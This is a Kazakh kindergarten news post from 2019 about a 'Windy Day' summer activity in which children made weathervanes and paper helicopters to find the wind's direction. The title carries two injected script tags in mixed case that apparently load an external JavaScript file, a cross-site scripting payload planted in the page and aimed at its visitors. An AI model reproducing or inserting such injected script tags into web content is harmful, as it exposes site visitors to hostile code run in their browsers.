«Самалды күн!»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.06.2019

«Сәлем, Жайдарлы жаз!»

 Жайқалып жапырақ, 
Құлпырып қызғалдақ. 
Тұратын көз тартып, 
Жаз келді күн шуақты дегендей, көптен күткен  жаз мезгілі де келіп жетті.
Жаз – ең ыстық және  өте тамаша жыл мезгілі. Балалар да осы жыл мезгілін жақсы көреді, себебі: далада  көп жүріп,  асыр салып ойнағанды ұнатады.  Осындай қуанышты күндерінің себепкері де болып жүрміз.Жақында «Балдырған» мектеп- балабақшасында , «Сәлем, Жайдарлы жаз!»

 атты апталықтың «Самалды күн»  бөлімі болып өтті.  Апталықтың негізгі мақсаты:  Флюгерлер, тікұшақтар дайындау, алаңда  ойын сауық құрып, желдің бағытын анықтау болатын. Оған балабақшамыздың  барлық топтарының балалары қатысты. Балалар осы күні қолдарына ұстаған флюгерлері мен түрлі- түсті қағаздардан жасалған тікұшақтарын  алып жүгіріп жүріп, желдің қай бағыттан соғып тұрғанын байқады. Олар қолдарындағы  заттарын  бір- біріне беріп,  ауыстырып ойнап,  желге қарсы жүгірсе ғана флюгерлердің басындағы желдеткіштерінің айналатынын бақылады, осылай,  апталықтың негізгі мақсатына жете білдік десек қателеспеймін.  Балалардың бал- бұл жанған жүздерінен- ақ, осы күні көңіл күйлері  өте тамаша болғанын  байқауға болады.

 

 

 

 

Просмотров: 1614


Пікір қосу



Деректерді қолтаңбаға қосу